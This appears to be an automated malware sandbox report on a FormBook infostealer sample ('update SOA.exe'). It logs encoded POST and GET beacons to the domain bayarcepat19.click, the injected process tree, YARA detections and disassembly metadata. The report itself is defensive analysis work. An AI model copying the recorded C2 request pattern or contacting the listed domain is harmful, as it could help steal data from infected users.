                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 67 4e 66 45 44 55 76 67 50 72 79 7a 56 55 4b 4d 66 43 46 51 43 71 4c 4d 55 4d 74 4a 6c 58 6e 48 46 33 65 30 4d 6d 70 64 75 2f 6e 72 4a 79 5a 57 46 52 6a 43 36 4a 71 6e 57 44 46 59 49 6d 69 41 52 48 41 4f 51 43 58 33 5a 59 5a 58 58 4a 67 44 67 63 78 41 6b 45 4e 6d 6f 70 36 69 53 69 65 4d 59 75 65 41 31 68 47 39 30 38 30 73 69 4e 76 58 54 31 51 7a 41 72 35 46 64 2b 73 77 2f 2b 4d 70 67 46 30 42 75 49 71 6c 53 43 49 4f 73 41 6e 61 51 50 61 43 70 2b 65 76 47 65 63 65 48 32 4c 64 59 7a 4c 49 6a 39 36 62 46 4b 39 45 56 47 61 57 61 2f 79 66 76 71 59 54 2f 30 47 4f 54 67 4b 4e 55 70 45 46 79 67 45 3d
                                                                                          Data Ascii: gHCXmDU=gNfEDUvgPryzVUKMfCFQCqLMUMtJlXnHF3e0Mmpdu/nrJyZWFRjC6JqnWDFYImiARHAOQCX3ZYZXXJgDgcxAkENmop6iSieMYueA1hG9080siNvXT1QzAr5Fd+sw/+MpgF0BuIqlSCIOsAnaQPaCp+evGeceH2LdYzLIj96bFK9EVGaWa/yfvqYT/0GOTgKNUpEFygE=
                                                                                          Sep 30, 2024 18:46:40.039232969 CEST | 830               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                          Date: Mon, 30 Sep 2024 16:46:39 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 167
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Mon, 30 Sep 2024 17:46:39 GMT
                                                                                          Location: https://www.bayarcepat19.click/5hcm/
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aihwm3lqS7zWyNIzJ%2FkrOaElLwtSRr5LQnB%2Bysc7qgYpc3FRK8rlW0E%2FmM%2FEd6fRJN2hnzijzU2f5ADtO4Wi4TuQs3WQFIAS4FHsk8MJm0E%2FeaZcV5cre2b8Lt%2F8DHDp9fAG29SgfzUx"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Vary: Accept-Encoding
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5b0bb8ef8422e-EWR
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                          34         | 192.168.2.5 | 49746       | 188.114.96.3   | 80               | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp                            | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:46:42.069973946 CEST | 841               | OUT       | POST /5hcm/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bayarcepat19.click
                                                                                          Origin: http://www.bayarcepat19.click
                                                                                          Referer: http://www.bayarcepat19.click/5hcm/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 67 4e 66 45 44 55 76 67 50 72 79 7a 56 30 61 4d 65 6c 78 51 45 4b 4c 50 52 4d 74 4a 76 33 6e 44 46 33 61 30 4d 6e 73 59 76 4e 44 72 4b 57 56 57 45 51 6a 43 32 70 71 6e 4f 7a 46 42 46 47 6a 43 52 48 45 77 51 44 72 33 5a 59 64 58 58 4c 34 44 68 72 74 42 6b 55 4e 6b 75 70 36 67 64 43 65 4d 59 75 65 41 31 68 53 44 30 38 63 73 69 35 72 58 54 57 49 79 4f 4c 35 45 61 2b 73 77 75 4f 4d 74 67 46 30 2f 75 4a 33 49 53 41 77 4f 73 41 58 61 51 2b 61 42 79 75 65 74 49 2b 64 75 48 56 36 56 5a 46 48 49 2b 63 61 65 62 37 5a 69 5a 51 33 38 41 64 36 33 38 4b 30 72 76 6e 4f 35 43 51 72 6b 4f 4b 55 31 73 33 54 57 65 52 61 6e 35 6b 71 39 6f 69 77 79 5a 34 4a 38 51 78 62 32
                                                                                          Data Ascii: gHCXmDU=gNfEDUvgPryzV0aMelxQEKLPRMtJv3nDF3a0MnsYvNDrKWVWEQjC2pqnOzFBFGjCRHEwQDr3ZYdXXL4DhrtBkUNkup6gdCeMYueA1hSD08csi5rXTWIyOL5Ea+swuOMtgF0/uJ3ISAwOsAXaQ+aByuetI+duHV6VZFHI+caeb7ZiZQ38Ad638K0rvnO5CQrkOKU1s3TWeRan5kq9oiwyZ4J8Qxb2
                                                                                          Sep 30, 2024 18:46:42.538909912 CEST | 822               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                          Date: Mon, 30 Sep 2024 16:46:42 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 167
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Mon, 30 Sep 2024 17:46:42 GMT
                                                                                          Location: https://www.bayarcepat19.click/5hcm/
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gffSJQXggBPncFzNL6zI1bM8Kchy8cMSa797D0G9KWpVkWls%2FiSKL3Ur0L5Ae8dooI4r3IaPgXjA8kz4og6wF48Lf5t%2B2X4FxHJxmVdDkMs49wcTUPeSYt7KEsS6D2SPkr9V7HRgeOhV"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Vary: Accept-Encoding
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5b0cb7cf1185d-EWR
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                          35         | 192.168.2.5 | 49747       | 188.114.96.3   | 80               | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp                            | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:46:44.614772081 CEST | 1858              | OUT       | POST /5hcm/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bayarcepat19.click
                                                                                          Origin: http://www.bayarcepat19.click
                                                                                          Referer: http://www.bayarcepat19.click/5hcm/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 67 4e 66 45 44 55 76 67 50 72 79 7a 56 30 61 4d 65 6c 78 51 45 4b 4c 50 52 4d 74 4a 76 33 6e 44 46 33 61 30 4d 6e 73 59 76 4e 4c 72 4b 6c 64 57 46 7a 62 43 33 70 71 6e 51 44 46 63 46 47 6a 44 52 44 6f 38 51 44 6e 4e 5a 61 31 58 55 6f 77 44 70 36 74 42 75 55 4e 6b 73 70 36 6c 53 69 65 5a 59 75 75 45 31 68 43 44 30 38 63 73 69 2f 48 58 52 46 51 79 4d 4c 35 46 64 2b 73 73 2f 2b 4e 4b 67 46 73 76 75 4a 7a 2b 54 77 51 4f 76 67 48 61 44 34 6d 42 2b 75 65 72 46 65 64 32 48 56 32 61 5a 44 6a 2b 2b 63 2f 78 62 34 4a 69 63 78 48 6b 44 2f 71 68 75 73 39 54 39 47 61 39 43 51 62 36 52 71 59 57 6f 57 6e 7a 52 51 79 57 77 44 65 48 6b 43 70 65 46 63 56 30 47 55 79 41 55 61 70 6a 77 33 44 54 53 2f 31 44 52 5a 49 65 42 62 35 55 45 77 6c 4d 4b 2f 53 32 53 31 36 62 6f 57 4f 5a 32 4e 55 48 41 54 7a 73 4c 52 76 31 33 5a 54 71 63 62 70 71 54 72 77 6b 43 46 6b 63 5a 5a 6b 6b 75 6a 53 32 2f 73 68 38 76 36 31 32 53 31 50 59 47 56 4d 4b 5a 58 44 41 6a 67 56 35 55 6e 4b 6e 61 79 4e 56 7a 62 4a 64 76 36 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=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 [TRUNCATED]
                                                                                          Sep 30, 2024 18:46:45.068811893 CEST | 836               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                          Date: Mon, 30 Sep 2024 16:46:45 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 167
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Mon, 30 Sep 2024 17:46:45 GMT
                                                                                          Location: https://www.bayarcepat19.click/5hcm/
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99%2B0wr8Pxq2PaYcgURBvqBEwH7UiumnZvILB%2BS%2BH8eOpstQKpNzsIaPAV4Xb%2FgaymfNMdDsG610%2Fg2hx1y3J0L%2FhsrChrDDni%2Fs6JStms9LJiX02qgYbFic48ZzcjSl7wfTgQX3%2F%2BMrp"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Vary: Accept-Encoding
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5b0db5a20437b-EWR
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                          36         | 192.168.2.5 | 49748       | 188.114.96.3   | 80               | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp                            | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:46:47.186758995 CEST | 549               | OUT       | GET /5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUklSdDj9q9dz65TNSy5hy/ttZPgJetaDNmb5haRLwL+/pH9A==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.bayarcepat19.click
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:46:47.677134037 CEST | 990               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                          Date: Mon, 30 Sep 2024 16:46:47 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 167
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Mon, 30 Sep 2024 17:46:47 GMT
                                                                                          Location: https://www.bayarcepat19.click/5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUklSdDj9q9dz65TNSy5hy/ttZPgJetaDNmb5haRLwL+/pH9A==&Gh9=g8u8
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sYoNeshvfmLpNrgMiy7WTtvz8cDsz8BPsyJovy68djl6Al6Wle7EaqNHDaB1uZzgIoErvC9jcWeDhV5crnjrCPPGKqOMLKqKaCDPStxdEJBJi6x4tQ2EoR3tqQmIfztC46zFM%2B0ta2j5"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5b0eb8bb34340-EWR
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>



                                                                                          Target ID:0
                                                                                          Start time:12:43:44
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Users\user\Desktop\update SOA.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\update SOA.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:1'401'959 bytes
                                                                                          MD5 hash:309A3F5CA72FF071A0EDD351EB3C6691
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:12:43:48
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\update SOA.exe"
                                                                                          Imagebase:0xa70000
                                                                                          File size:46'504 bytes
                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:12:44:08
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe"
                                                                                          Imagebase:0x4c0000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:5
                                                                                          Start time:12:44:10
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Windows\SysWOW64\notepad.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\notepad.exe"
                                                                                          Imagebase:0x630000
                                                                                          File size:165'888 bytes
                                                                                          MD5 hash:E92D3A824A0578A50D2DD81B5060145F
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:6
                                                                                          Start time:12:44:23
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe"
                                                                                          Imagebase:0x4c0000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:9
                                                                                          Start time:12:44:35
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                          Imagebase:0x7ff79f9e0000
                                                                                          File size:676'768 bytes
                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true


                                                                                            Execution Graph

                                                                                            Execution Coverage:1.4%
                                                                                            Dynamic/Decrypted Code Coverage:4.7%
                                                                                            Signature Coverage:7.9%
                                                                                            Total number of Nodes:127
                                                                                            Total number of Limit Nodes:9

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N$N
                                                                                            • API String ID: 0-3855217897
                                                                                            • Opcode ID: f89fcfe8a7ec95ac77d6ae59a2586a5e641ab157a24ead25490e3025b2df80e4
                                                                                            • Instruction ID: 846e345c178b5d6c4a693780b6a168f8e8536fe6faccb3424975541efa0ef6ab
                                                                                            • Opcode Fuzzy Hash: f89fcfe8a7ec95ac77d6ae59a2586a5e641ab157a24ead25490e3025b2df80e4
                                                                                            • Instruction Fuzzy Hash: E4F192B0E00219AFDB24DF94CC81BEEB779EF44304F14819EE515A7241DB786A85CFA9

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: e5c4bbe89f40af0726b0f43d48a7e7614d557be38eb8230b4c9e55b121e15b07
                                                                                            • Instruction ID: a0c37dff0129ecde4e604a7e5538e5a43d5b941f9cb87f3eacc9c9c84b095d1c
                                                                                            • Opcode Fuzzy Hash: e5c4bbe89f40af0726b0f43d48a7e7614d557be38eb8230b4c9e55b121e15b07
                                                                                            • Instruction Fuzzy Hash: 7E011EB5E0020DBBDF10EAE5DC46FDEB7789B54308F4081AAE90897241F635EB58CB95

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C78A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 35af77d883470ba60f9356892d958fd741f5bc8cd55b1907fa4f9f8c6b65b2ac
                                                                                            • Instruction ID: d46e80b1df54a4b5232f7abf91cfbbe41bdfd1c9f65068c3eb417ed65bfef87e
                                                                                            • Opcode Fuzzy Hash: 35af77d883470ba60f9356892d958fd741f5bc8cd55b1907fa4f9f8c6b65b2ac
                                                                                            • Instruction Fuzzy Hash: 71E04F766406147BD620AA5ADC01F9B776CDFC5710F008429FA0867245CA717A1587A4
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                                                                            • Instruction ID: 8be3f98a60af97975ec109fd72819471920c05d00907bd7c21b7e5f0758742fa
                                                                                            • Opcode Fuzzy Hash: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                                                                            • Instruction Fuzzy Hash: 1290023160550802D100B2584554746500A87D0301FA6C412A042456CD8B998A5165B2

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 253 3a72b60-3a72b6c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                                                                            • Instruction ID: f2f3aed07c35dfcbf5890919c288cb173e9f7752dfdc21db169de1d2204c02dc
                                                                                            • Opcode Fuzzy Hash: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                                                                            • Instruction Fuzzy Hash: 43900261202404034105B2584454656800F87E0301B96C022E1014594DCA2989916135

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 254 3a72df0-3a72dfc LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                                                                            • Instruction ID: 7e6c41b1e2a895b3658c0bbefc5c344f7b2255cc5c1d8d85d620e24d36ff4704
